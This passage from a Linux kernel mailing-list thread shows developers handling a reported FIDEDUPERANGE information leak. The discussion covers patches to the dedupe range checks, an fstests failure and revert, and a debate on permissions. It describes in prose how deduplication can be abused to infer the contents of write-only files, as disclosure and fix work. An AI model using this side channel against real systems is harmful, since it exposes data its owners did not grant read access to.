kinds of crazy, and maybe that code should make explicitly sure it can never happen by just saying "a zero-sized compare can never dedupe successfully" or something like that. Just in case. But returning the original length, even when you didn't actually dedupe it also seems entirely pointless. Linus ^ permalink raw reply [flat|nested] 33+ messages in thread
* Re: [PATCH] vf/remap: return the amount of bytes actually deduplicated 2022-07-14 0:22 ` Dave Chinner 2022-07-14 1:03 ` Linus Torvalds @ 2022-07-16 21:15 ` Mark Fasheh 1 sibling, 0 replies; 33+ messages in thread From: Mark Fasheh @ 2022-07-16 21:15 UTC (permalink / raw) To: Dave Chinner Cc: ansgar.loesser, Linus Torvalds, Darrick J. Wong, Josef Bacik, Christoph Hellwig, Amir Goldstein, Matthew Wilcox, Miklos Szeredi, Al Viro, linux-fsdevel, Security Officers, Max Schlecht, Björn Scheuermann Hi Dave, On Wed, Jul 13, 2022 at 5:22 PM Dave Chinner <david@fromorbit.com> wrote: > e.g. If userspace is looping over a file based on the returned > info->bytes_deduped value, can this change cause them to behave > differently? My memory is a bit fuzzy on all of this but I'm pretty sure that this is what duperemove does. From what I recall, 'bytes_deduped' got turned into 'this is how far into the request I went'. Not the greatest I know, but as you point out, it works and we shouldn't break it. Thanks, --Mark ^ permalink raw reply [flat|nested] 33+ messages in thread
* Re: [PATCH] vf/remap: return the amount of bytes actually deduplicated 2022-07-13 18:51 ` [PATCH] vf/remap: return the amount of bytes actually deduplicated Ansgar Lößer 2022-07-13 19:09 ` Linus Torvalds 2022-07-14 0:22 ` Dave Chinner @ 2022-07-14 22:32 ` Dave Chinner 2022-07-14 22:42 ` Linus Torvalds 2 siblings, 1 reply; 33+ messages in thread From: Dave Chinner @ 2022-07-14 22:32 UTC (permalink / raw) To: ansgar.loesser Cc: Linus Torvalds, Darrick J. Wong, Josef Bacik, Christoph Hellwig, Amir Goldstein, Mark Fasheh, Matthew Wilcox, Miklos Szeredi, Al Viro, linux-fsdevel, Security Officers, Max Schlecht, Björn Scheuermann On Wed, Jul 13, 2022 at 08:51:44PM +0200, Ansgar Lößer wrote: > When using the FIDEDUPRANGE ioctl, in case of success the requested size > is returned. In some cases this might not be the actual amount of bytes > deduplicated. > > This change modifies vfs_dedupe_file_range() to report the actual amount > of bytes deduplicated, instead of the requested amount. > > Link: https://lore.kernel.org/linux-fsdevel/5548ef63-62f9-4f46-5793-03165ceccacc@tu-darmstadt.de/ > > Reported-by: Ansgar Lößer (ansgar.loesser@kom.tu-darmstadt.de) > Reported-by: Max Schlecht (max.schlecht@informatik.hu-berlin.de) > Reported-by: Björn Scheuermann (scheuermann@kom.tu-darmstadt.de) > Signed-off-by: Ansgar Lößer <ansgar.loesser@kom.tu-darmstadt.de> > --- > > > Mind sending it with a sign-off and a short commit message? > > > > Linus > Sure, thank you! > > This is my first commit, so I hope it is ok like this. > > > fs/remap_range.c | 2 +- > 1 file changed, 1 insertion(+), 1 deletion(-) > > diff --git a/fs/remap_range.c b/fs/remap_range.c > index e112b5424cdb..072c2c48aeed 100644 > --- a/fs/remap_range.c > +++ b/fs/remap_range.c > @@ -546,7 +546,7 @@ int vfs_dedupe_file_range(struct file *file, struct > file_dedupe_range *same) > else if (deduped < 0) > info->status = deduped; > else > - info->bytes_deduped = len; > + info->bytes_deduped = deduped; > > next_fdput: > fdput(dst_fd); > -- > 2.35.1 As I suspected would occur, this change causes test failures. e.g generic/517 in fstests fails with: generic/517 1s ... - output mismatch (see /home/dave/src/xfstests-dev/results//xfs_quota/generic/517.out.bad) --- tests/generic/517.out 2019-10-29 11:47:07.464539451 +1100 +++ /home/dave/src/xfstests-dev/results//xfs_quota/generic/517.out.bad 2022-07-14 18:00:04.833536434 +1000 @@ -13,7 +13,7 @@ * 0786528 ae ae ae ae 0786532 -deduped 131172/131172 bytes at offset 65536 +deduped 131072/131172 bytes at offset 65536 XXX Bytes, X ops; XX:XX:XX.X (XXX YYY/sec and XXX ops/sec) File content after first deduplication and before unmounting: ... (Run 'diff -u /home/dave/src/xfstests-dev/tests/generic/517.out /home/dave/src/xfstests-dev/results//xfs_quota/generic/517.out.bad' to see the entire diff) The whole diff is: -- /home/dave/src/xfstests-dev/tests/generic/517.out 2019-10-29 11:47:07.464539451 +1100 +++ /home/dave/src/xfstests-dev/results//xfs_quota/generic/517.out.bad 2022-07-14 18:00:04.833536434 +1000 @@ -13,7 +13,7 @@ * 0786528 ae ae ae ae 0786532 -deduped 131172/131172 bytes at offset 65536 +deduped 131072/131172 bytes at offset 65536 XXX Bytes, X ops; XX:XX:XX.X (XXX YYY/sec and XXX ops/sec) File content after first deduplication and before unmounting: 0000000 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b @@ -33,8 +33,6 @@ 0786532 wrote 100/100 bytes at offset 0 XXX Bytes, X ops; XX:XX:XX.X (XXX YYY/sec and XXX ops/sec) -deduped 100/100 bytes at offset 655360 -XXX Bytes, X ops; XX:XX:XX.X (XXX YYY/sec and XXX ops/sec) File content after second deduplication: 0000000 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b * This shows user visible API behaviours (i.e. "short dedupe" behaviour) that may be unexpected by userspace. So while the change might be technically correct, it definitely changes the behaviour at least one test expects to occur. This is why I asked if this had been tested - it tells us if userspace is likely to see issues with the API change. "Correct but breaks tests" is basically a warning that we should expect users/applications to notice the API change and that there's a good likelyhood of downstream problems arising from it... Linus, can you please revert this commit for the 5.19 series (before the stable autosel bot sends it back to stable kernels, please!) to give us more time to investigate and consider the impact of the the API change on userspace applications before we commit to changing the API. -Dave. -- Dave Chinner david@fromorbit.com ^ permalink raw reply [flat|nested] 33+ messages in thread
* Re: [PATCH] vf/remap: return the amount of bytes actually deduplicated 2022-07-14 22:32 ` Dave Chinner @ 2022-07-14 22:42 ` Linus Torvalds 2022-07-14 23:15 ` Dave Chinner 0 siblings, 1 reply; 33+ messages in thread From: Linus Torvalds @ 2022-07-14 22:42 UTC (permalink / raw) To: Dave Chinner Cc: ansgar.loesser, Darrick J. Wong, Josef Bacik, Christoph Hellwig, Amir Goldstein, Mark Fasheh, Matthew Wilcox, Miklos Szeredi, Al Viro, linux-fsdevel, Security Officers, Max Schlecht, Björn Scheuermann On Thu, Jul 14, 2022 at 3:32 PM Dave Chinner <david@fromorbit.com> wrote: > > Linus, can you please revert this commit for the 5.19 series (before > the stable autosel bot sends it back to stable kernels, please!) to > give us more time to investigate and consider the impact of the the > API change on userspace applications before we commit to changing > the API. Done. That said, even from the fastest output, I have to say that the new behavior looks like the right one, and the old one just returned a fantasy that didn't actually match what the dedupe operation actually *did*. But leaving this for later is not a problem. Linus ^ permalink raw reply [flat|nested] 33+ messages in thread
* Re: [PATCH] vf/remap: return the amount of bytes actually deduplicated 2022-07-14 22:42 ` Linus Torvalds @ 2022-07-14 23:15 ` Dave Chinner 0 siblings, 0 replies; 33+ messages in thread From: Dave Chinner @ 2022-07-14 23:15 UTC (permalink / raw) To: Linus Torvalds Cc: ansgar.loesser, Darrick J. Wong, Josef Bacik, Christoph Hellwig, Amir Goldstein, Mark Fasheh, Matthew Wilcox, Miklos Szeredi, Al Viro, linux-fsdevel, Security Officers, Max Schlecht, Björn Scheuermann On Thu, Jul 14, 2022 at 03:42:13PM -0700, Linus Torvalds wrote: > On Thu, Jul 14, 2022 at 3:32 PM Dave Chinner <david@fromorbit.com> wrote: > > > > Linus, can you please revert this commit for the 5.19 series (before > > the stable autosel bot sends it back to stable kernels, please!) to > > give us more time to investigate and consider the impact of the the > > API change on userspace applications before we commit to changing > > the API. > > Done. Thanks! > That said, even from the fastest output, I have to say that the new > behavior looks like the right one, and the old one just returned a > fantasy that didn't actually match what the dedupe operation actually > *did*. Very true, and I'm definitely not arguing that the change is wrong. We just need a bit of time to look at the various major dedupe apps and check that they still do the right thing w.r.t. proposed change. This late in the cycle I want to make sure we don't end up screwing things up and creating unnecessary urgent work for anyone in the near future... > But leaving this for later is not a problem. *nod* Cheers, Dave. -- Dave Chinner david@fromorbit.com ^ permalink raw reply [flat|nested] 33+ messages in thread
* Re: Information Leak: FIDEDUPERANGE ioctl allows reading writeonly files 2022-07-13 6:46 ` Dave Chinner 2022-07-13 7:49 ` [PATCH] fs/remap: constrain dedupe of EOF blocks Dave Chinner @ 2022-07-13 8:16 ` Linus Torvalds 2022-07-13 23:48 ` Dave Chinner 2022-07-13 17:17 ` Ansgar Lößer 2 siblings, 1 reply; 33+ messages in thread From: Linus Torvalds @ 2022-07-13 8:16 UTC (permalink / raw) To: Dave Chinner Cc: Darrick J. Wong, Josef Bacik, ansgar.loesser, Christoph Hellwig, Amir Goldstein, Mark Fasheh, Matthew Wilcox, Miklos Szeredi, Al Viro, linux-fsdevel, Security Officers, Max Schlecht, Björn Scheuermann On Tue, Jul 12, 2022 at 11:46 PM Dave Chinner <david@fromorbit.com> wrote: > > Hence if we restrict EOF block deduping to both the src and dst > files having matching EOF offsets in their EOF blocks like so: > > - if (pos_in + count == size_in) { > + if (pos_in + count == size_in && > + (!(remap_flags & REMAP_FILE_DEDUP) || pos_out + count == size_out)) { > bcount = ALIGN(size_in, bs) - pos_in; I agree with checking the target size too. And I can see how missing that might cause the problem. I don't think that is limited to the REMAP_FILE_DEDUP case, though. Even if you a clone operation, you cannot just clone the EOF block to some random part of the destination. Anyway, isn't all of this supposed to be done by generic_remap_check_len()? That function already takes care of a similar concern for REMAP_FILE_CAN_SHORTEN, where the size of the *output* file matters. So generic_remap_check_len() basically already does one EOF block check for the output file. It just doesn't do it for the input side. And currently generic_remap_check_len() is done too late for REMAP_FILE_DEDUP, which did its handling just before calling it. So while I agree with your patch from a "this seems to be the underlying bug", I think the fix should be to move this "both EOF blocks have to match" logic to generic_remap_check_len(), and just do that *before* that if (remap_flags & REMAP_FILE_DEDUP) { in generic_remap_file_range_prep(). No? That said, the rest of that code in generic_remap_checks() still makes little to no sense to me. Look: > bcount = ALIGN(size_in, bs) - pos_in; and we literally *just* checked that "pos_in + count == size_in". So we can write that as > bcount = ALIGN(pos_in + count, bs) - pos_in; That doesn't look simpler, but... Again, just a few lines above this all, we had > if (!IS_ALIGNED(pos_in, bs) || !IS_ALIGNED(pos_out, bs)) > return -EINVAL; so we know that 'pos_in' is aligned wrt bs. So we can rewrite that "ALIGN(pos_in + count, bs)" as "pos_in + ALIGN(count, bs)", because 'pos_in' doesn't change anything wrt an alignment operation. And then trivial simplification ("pos_in - pos_in goes away") makes the whole expression be just > bcount = ALIGN(count, bs); which just once more makes me go "maybe this code works, but it is clearly written for maximum nonsensical value". The "else" side is equally overly complex too, and does if (!IS_ALIGNED(count, bs)) count = ALIGN_DOWN(count, bs); bcount = count; which is just a really complicated way to write bcount = ALIGN_DOWN(count, bs); count = bcount; so that side if the if-statement knew that it could just align the count directly, but decided to do that in the least obvious way too. If 'count' was already aligned, ALIGN_DOWN() does nothing. And masking is much cheaper than testing and branching. Not to mention just *simpler*: One case aligns up to the next block boundary ("include the shared EOF block"), the other case aligns down ("only try to merge full blocks")./ Now the code makes sense, although it's still somewhat subtle in that the align-down case will also update 'count' (which is returned), while the EOF code will only set 'bcount' (which is only used for the overlapping range check) . But then, when you look at that and understand what's going on, that in turn then makes *another* thing obvious: the whole existence of 'bcount' is entirely pointless. Because 'bcount' is only used for that range check, and for the non-EOF case it's the same as 'count'. And for the EOF case, doing that alignment is entirely pointless, since if the in/out inodes are the same, then the file size is going to be the same, and the EOF block is going to overlap whether bcount was aligned to block boundary or not. So the EOF case might as well just have made 'bcount = count' without any alignment to the next block boundary at all. And once it does that, now bcount is _always_ the same as count, and there is no point in having bcount at all. So after doing all the above simplification, you can then get rid of 'bcount' entirely. > So, yeah, I think arguing about permissions and API and all that > stuff is just going completely down the wrong track because it > doesn't actually address the root cause of the information leak.... I agree that getting this "check the right range" thing right is the prime thing. The code being *very* hard to follow and not having any obvious rules really does not help, though. The permission checks are odd. And the range checks were odd and inscrutable and buggy to boot. Yes, I require that people don't break user space. That's the #1 rule of kernel development. But that does not mean or imply "write incomprehensible code". And honestly, I think your suggested patch just makes incomprehensibly and pointlessly complex code even more so. Which is why I'm suggesting the real fix is to clean it up, and mover that EOF offset check to generic_remap_check_len() where it belongs, and where we already have that comment: * ... For deduplication we accept a partial EOF block only if it ends at the * destination file's EOF (can not link it into the middle of a file). but that comment doesn't actually match the code in that function. In fact, that comment currently doesn't match any existing code at all (your suggested patch would be that code, but in another place entirely). Can we please all agree that this code is too obscure for its own good? Linus ^ permalink raw reply [flat|nested] 33+ messages in thread
* Re: Information Leak: FIDEDUPERANGE ioctl allows reading writeonly files 2022-07-13 8:16 ` Information Leak: FIDEDUPERANGE ioctl allows reading writeonly files Linus Torvalds @ 2022-07-13 23:48 ` Dave Chinner 0 siblings, 0 replies; 33+ messages in thread From: Dave Chinner @ 2022-07-13 23:48 UTC (permalink / raw) To: Linus Torvalds Cc: Darrick J. Wong, Josef Bacik, ansgar.loesser, Christoph Hellwig, Amir Goldstein, Mark Fasheh, Matthew Wilcox, Miklos Szeredi, Al Viro, linux-fsdevel, Security Officers, Max Schlecht, Björn Scheuermann On Wed, Jul 13, 2022 at 01:16:37AM -0700, Linus Torvalds wrote: > > Can we please all agree that this code is too obscure for its own good? Oh, there's no denying that, or that the API is .... poor. The problem is that touching this code has a very high validation burden. Like Darrick, I'm familiar with this code because we were the poor shmucks who decided dedupe needed data integrity testing before we could support it in XFS. Three months of finding and fixing data corruption after data corruption in the ioctl/vfs layers and tens of billions of fsx ops later... ... and the code has really not changed very much since then. That's the fundamental problem with rewriting this code - validating that changes have not introduced new data corruption bugs on XFS, btrfs, NFS and other idedupe supporting filesystems is time consuming and resource intensive. And it can't be skipped, because corrupting user data is even worse than breaking userspace applications (i.e. you can fix the kernel so the apps run again, but corrupted data is gone forever). So while the code might be somewhat inscrutible for outsiders with no familiarity of the dedupe/clone APIs or it's required behaviours, it works as advertised and doesn't corrupt data. Hence for the past few years the rule "don't try to fix what ain't broke" has applied - we've all got plenty of stuff that is actually broken or deficient and needs to be fixed to deal with first.... Cheers, Dave. -- Dave Chinner david@fromorbit.com ^ permalink raw reply [flat|nested] 33+ messages in thread
* Re: Information Leak: FIDEDUPERANGE ioctl allows reading writeonly files 2022-07-13 6:46 ` Dave Chinner 2022-07-13 7:49 ` [PATCH] fs/remap: constrain dedupe of EOF blocks Dave Chinner 2022-07-13 8:16 ` Information Leak: FIDEDUPERANGE ioctl allows reading writeonly files Linus Torvalds @ 2022-07-13 17:17 ` Ansgar Lößer 2 siblings, 0 replies; 33+ messages in thread From: Ansgar Lößer @ 2022-07-13 17:17 UTC (permalink / raw) To: Dave Chinner, Linus Torvalds Cc: Darrick J. Wong, Josef Bacik, ansgar.loesser, Christoph Hellwig, Amir Goldstein, Mark Fasheh, Matthew Wilcox, Miklos Szeredi, Al Viro, linux-fsdevel, Security Officers, Max Schlecht, Björn Scheuermann > That's the bug in this code - the dedupe length EOF rounding needs > to be more constrained as it's allowing an EOF block to be partially > matched against any full filesystem block as long as the range from > start to EOF in the block matches. That's the information leak right > there, and it has nothing to do with permissions. > > Hence if we restrict EOF block deduping to both the src and dst > files having matching EOF offsets in their EOF blocks like so: > > - if (pos_in + count == size_in) { > + if (pos_in + count == size_in && > + (!(remap_flags & REMAP_FILE_DEDUP) || pos_out + count == size_out)) { > bcount = ALIGN(size_in, bs) - pos_in; > } else { > if (!IS_ALIGNED(count, bs)) > count = ALIGN_DOWN(count, bs); > bcount = count; > } > > This should fix the bug that was reported as it prevents dedupe an > EOF block against non-EOF blocks or even EOF blocks where EOF is at > a different offset into the EOF block. > > So, yeah, I think arguing about permissions and API and all that > stuff is just going completely down the wrong track because it > doesn't actually address the root cause of the information leak.... I am sorry, while I do agree about the patch, I strongly disagree regarding the permissions. Of course, this exact approach will not work anymore in practice, since up to 2^^(4096*8) tries would be needed to guess a single 4K block correctly. Nevertheless it would be possible to guess the correct data for the whole block, since a comparison of data is still possible. So if I want to check whether a file contains a specific block (or one of a set) I can still do so, without having read access. Whether to keep this behavior to not break backwards compatibility is not my decision, but the root problem of this leak is *not* about the minimum block size that can be deduplicated, or that it can be lowered by using the EOF behavior. It is about not needing read permissions to compare data from a file. Best regards, Ansgar -- M.Sc. Ansgar Lößer Fachgebiet Kommunikationsnetze Fachbereich für Elektrotechnik und Informationstechnik Technische Universität Darmstadt Rundeturmstraße 10 64283 Darmstadt E-Mail: ansgar.loesser@kom.tu-darmstadt.de http://www.kom.tu-darmstadt.de ^ permalink raw reply [flat|nested] 33+ messages in thread
* Re: Information Leak: FIDEDUPERANGE ioctl allows reading writeonly files 2022-07-13 0:48 ` Darrick J. Wong 2022-07-13 2:58 ` Linus Torvalds @ 2022-07-13 17:16 ` Ansgar Lößer 2022-07-13 22:43 ` Dave Chinner 1 sibling, 1 reply; 33+ messages in thread From: Ansgar Lößer @ 2022-07-13 17:16 UTC (permalink / raw) To: Darrick J. Wong, Linus Torvalds Cc: Josef Bacik, ansgar.loesser, Christoph Hellwig, Amir Goldstein, Mark Fasheh, Matthew Wilcox, Miklos Szeredi, Al Viro, linux-fsdevel, Security Officers, Max Schlecht, Björn Scheuermann >> And the inode_permission() check is wrong, but at least it does have >> the important check there (ie that FMODE_WRITE one). So doing the >> inode_permissions() check at worst just makes it fail too often, but >> since it's all a "optimistically dedupe" anyway, that kind of "fail in >> odd situations" doesn't really matter. >> >> So for allow_file_dedupe(), I'd suggest: >> >> (a) remove the inode_permission() check in allow_file_dedupe() >> >> (b) remove the uid_eq() check for the same reason (if you didn't open >> the destination for write, you have no business deduping anything, >> even if you're the owner) > So we're going to break userspace? > https://github.com/markfasheh/duperemove/issues/129 > I am actually not sure why writability is needed for 'dest' at all. Of course, the deduplication might cause a write on the block device or underlying storage, but from the abstract fs perspective, neither the data nor any metadata can change, regardless of the success of the deduplication. The only attribute that might change is the position of the block on the blockdevice. Does changing this information require write permissions? If I interpret the linked issue correctly, only needing read permissions on both fds would also solve this problem. Best regards, Ansgar -- M.Sc. Ansgar Lößer Fachgebiet Kommunikationsnetze Fachbereich für Elektrotechnik und Informationstechnik Technische Universität Darmstadt Rundeturmstraße 10 64283 Darmstadt E-Mail: ansgar.loesser@kom.tu-darmstadt.de http://www.kom.tu-darmstadt.de ^ permalink raw reply [flat|nested] 33+ messages in thread
* Re: Information Leak: FIDEDUPERANGE ioctl allows reading writeonly files 2022-07-13 17:16 ` Ansgar Lößer @ 2022-07-13 22:43 ` Dave Chinner 0 siblings, 0 replies; 33+ messages in thread From: Dave Chinner @ 2022-07-13 22:43 UTC (permalink / raw) To: ansgar.loesser Cc: Darrick J. Wong, Linus Torvalds, Josef Bacik, Christoph Hellwig, Amir Goldstein, Mark Fasheh, Matthew Wilcox, Miklos Szeredi, Al Viro, linux-fsdevel, Security Officers, Max Schlecht, Björn Scheuermann On Wed, Jul 13, 2022 at 07:16:14PM +0200, Ansgar Lößer wrote: > > > And the inode_permission() check is wrong, but at least it does have > > > the important check there (ie that FMODE_WRITE one). So doing the > > > inode_permissions() check at worst just makes it fail too often, but > > > since it's all a "optimistically dedupe" anyway, that kind of "fail in > > > odd situations" doesn't really matter. > > > > > > So for allow_file_dedupe(), I'd suggest: > > > > > > (a) remove the inode_permission() check in allow_file_dedupe() > > > > > > (b) remove the uid_eq() check for the same reason (if you didn't open > > > the destination for write, you have no business deduping anything, > > > even if you're the owner) > > So we're going to break userspace? > > https://github.com/markfasheh/duperemove/issues/129 > > > > I am actually not sure why writability is needed for 'dest' at all. Of > course, the deduplication might cause a write on the block device or > underlying storage, but from the abstract fs perspective, neither the data > nor any metadata can change, regardless of the success of the deduplication. Metadata is most definitely changed by a dedupe operation. Run filefrag or FIEMAP before/after and you'll see that the block mapping for at least the destination file (and maybe the source, too!) as a result of the dedupe operation. > The only attribute that might change is the position of the block on the > blockdevice. Does changing this information require write permissions? Yes. The block map is needed to access the user data, hence POSIX requires modifications to the block map be covered by fdatasync() persistence guarantees. i.e. modifying the block map of a file/inode is most definitely considered a write operation that needs a post-completion fdatasync/fsync operation to provide the modification with persistence guarantees. Indeed, we require write permissions for fallocate() operations that directly modify the block list but don't change data, too. e.g. preallocation over a hole, sparsifying a file by punching out data ranges containing only zeros, etc. These are not changing the user visible data; they only modify the underlying block map of the inode. This is exactly the same as dedupe - these operations are not modifying user visible data, they just modify the index needed to find the physical location of the user data in the filesystem. In fact, there's an fallocate() operation called FALLOC_FL_UNSHARE_RANGE, which is the exact opposite of dedupe - it takes a shared extent and explicitly breaks the sharing, copying data and changing the underlying block map of the file to do that. It doesn't change user visible data, but it most definitely changes the metadata and the data layout of the file. So, yeah, operations that directly manipulate the extent layout of the file (reflink/clone, dedupe, fallocate, etc) are most definitely modification operations. Always have been, always will be, and should always require write permissions to have been granted to the caller... Cheers, Dave. -- Dave Chinner david@fromorbit.com ^ permalink raw reply [flat|nested] 33+ messages in thread
* Re: Information Leak: FIDEDUPERANGE ioctl allows reading writeonly files 2022-07-12 17:33 ` Linus Torvalds 2022-07-12 18:43 ` Matthew Wilcox 2022-07-12 19:02 ` Josef Bacik @ 2022-07-13 17:14 ` Ansgar Lößer 2022-07-13 18:03 ` Linus Torvalds 2 siblings, 1 reply; 33+ messages in thread From: Ansgar Lößer @ 2022-07-13 17:14 UTC (permalink / raw) To: Linus Torvalds, ansgar.loesser, Darrick J. Wong, Christoph Hellwig, Amir Goldstein, Mark Fasheh, Matthew Wilcox, Josef Bacik, Miklos Szeredi Cc: Al Viro, linux-fsdevel, Security Officers, Max Schlecht, Björn Scheuermann > First off - an odd technicality: you can already read write-only files > by simply mmap'ing them, because on many architectures PROT_WRITE ends > up implying PROT_READ too. > > So you should basically expect that "I have permissions to write to > the file" automatically means that you can read it too. > > People simply do that "open for writing, mmap to change it" and expect > it to work - not realizing that that means you have to be able to read > it too. Thank you for the explanation. Unfortunately I was not able to reproduce this. I do understand, that being able to write to memory without being able to read from it cannot be implemented because of hardware limitations on many architectures. However using a writeonly fd in a call to mmap() in the first place already consistently fails for me. According to the man pages this is actually intended behavior. "Errors: EACCESS: [... If] a file mapping was requested, but fd is not open for reading." Therefore I do not see how it is possible to read out data without a readable fd, since no mapping can be created without read permissions. I assumed readability not being a subset of writability for files was the exact reason for this limitation on the fd in mmap(). Do I miss something here? > But > >> - if (!inode_permission(mnt_userns, inode, MAY_WRITE)) >> + if (!inode_permission(mnt_userns, inode, MAY_READ | MAY_WRITE)) > > looks wrong. > > Note that readability is about the file *descriptor*, not the inode. > Because the file descriptor may have been opened by somebody who had > permission to read the file even for a write-only file. I do agree. At least it did not look typical for me. The idea for the patch was simply to have the smallest possible change for this specific issue. Best regards, Ansgar -- M.Sc. Ansgar Lößer Fachgebiet Kommunikationsnetze Fachbereich für Elektrotechnik und Informationstechnik Technische Universität Darmstadt Rundeturmstraße 10 64283 Darmstadt E-Mail: ansgar.loesser@kom.tu-darmstadt.de http://www.kom.tu-darmstadt.de ^ permalink raw reply [flat|nested] 33+ messages in thread
* Re: Information Leak: FIDEDUPERANGE ioctl allows reading writeonly files 2022-07-13 17:14 ` Ansgar Lößer @ 2022-07-13 18:03 ` Linus Torvalds 0 siblings, 0 replies; 33+ messages in thread From: Linus Torvalds @ 2022-07-13 18:03 UTC (permalink / raw) To: ansgar.loesser Cc: Darrick J. Wong, Christoph Hellwig, Amir Goldstein, Mark Fasheh, Matthew Wilcox, Josef Bacik, Miklos Szeredi, Al Viro, linux-fsdevel, Security Officers, Max Schlecht, Björn Scheuermann On Wed, Jul 13, 2022 at 10:15 AM Ansgar Lößer <ansgar.loesser@tu-darmstadt.de> wrote: > > > Thank you for the explanation. Unfortunately I was not able to reproduce > this. I do understand, that being able to write to memory without being > able to read from it cannot be implemented because of hardware > limitations on many architectures. Oh, you are right, we actually catch that situation, and require FMODE_READ for all mmap's. For some reason I was entirely sure that this had come up and we didn't, but I see do_mmap() clearly doing fallthrough; case MAP_PRIVATE: if (!(file->f_mode & FMODE_READ)) return -EACCES; where that "fallthrough" is for the non-MAP_PRIVATE cases, so it hits shared mappings too. I was sure we had hit this case and it caused problems to check for it, but that test goes back to before the git days (and in fact to before the BK days). So clearly my "clear memory" was complete garbage. And thinking about it, I suspect said "clear memory" goes back to me having issues with the original alpha port, where the hardware *did* technically support write-only mappings (_PAGE_FOR set - "Fault On Read", but _PAGE_FOW not set). So alpha was the first port I did (and a big influence for how the portable VM model came about), and page protections could be done "right" in theory from a memory management standpoint. But even then you can't actually do it, because writable maps required reading _anyway_ - because the common alpha sequence was to do byte accesses as "read-modify-write" longword accesses. So that's likely the source of my conviction that write-only mappings always require read accesses, but I had it exactly the wrong way around - it's not even hardware-specific, but general, and just means that we actually refuse to mmap() files that have been opened write-only. That should teach me to actually go and look at the code (or test), not go by "I have a distinct memory". Linus ^ permalink raw reply [flat|nested] 33+ messages in thread
end of thread, other threads:[~2022-07-16 21:16 UTC | newest] Thread overview: 33+ messages (download: mbox.gz follow: Atom feed -- links below jump to the message on this page -- 2022-07-12 12:11 Information Leak: FIDEDUPERANGE ioctl allows reading writeonly files Ansgar Lößer 2022-07-12 17:33 ` Linus Torvalds 2022-07-12 18:43 ` Matthew Wilcox 2022-07-12 18:47 ` Linus Torvalds 2022-07-12 18:51 ` Linus Torvalds 2022-07-12 19:02 ` Josef Bacik 2022-07-12 19:07 ` Linus Torvalds 2022-07-12 19:23 ` Linus Torvalds 2022-07-12 20:03 ` Josef Bacik 2022-07-12 20:48 ` Linus Torvalds 2022-07-13 0:48 ` Darrick J. Wong 2022-07-13 2:58 ` Linus Torvalds 2022-07-13 4:14 ` Linus Torvalds 2022-07-13 6:46 ` Dave Chinner 2022-07-13 7:49 ` [PATCH] fs/remap: constrain dedupe of EOF blocks Dave Chinner 2022-07-13 8:19 ` Linus Torvalds 2022-07-13 17:18 ` Ansgar Lößer 2022-07-13 17:26 ` Linus Torvalds 2022-07-13 18:51 ` [PATCH] vf/remap: return the amount of bytes actually deduplicated Ansgar Lößer 2022-07-13 19:09 ` Linus Torvalds 2022-07-14 0:22 ` Dave Chinner 2022-07-14 1:03 ` Linus Torvalds 2022-07-16 21:15 ` Mark Fasheh 2022-07-14 22:32 ` Dave Chinner 2022-07-14 22:42 ` Linus Torvalds 2022-07-14 23:15 ` Dave Chinner 2022-07-13 8:16 ` Information Leak: FIDEDUPERANGE ioctl allows reading writeonly files Linus Torvalds 2022-07-13 23:48 ` Dave Chinner 2022-07-13 17:17 ` Ansgar Lößer 2022-07-13 17:16 ` Ansgar Lößer 2022-07-13 22:43 ` Dave Chinner 2022-07-13 17:14 ` Ansgar Lößer 2022-07-13 18:03 ` Linus Torvalds
This is a public inbox, see mirroring instructions for how to clone and mirror all data and code used for this inbox; as well as URLs for NNTP newsgroup(s).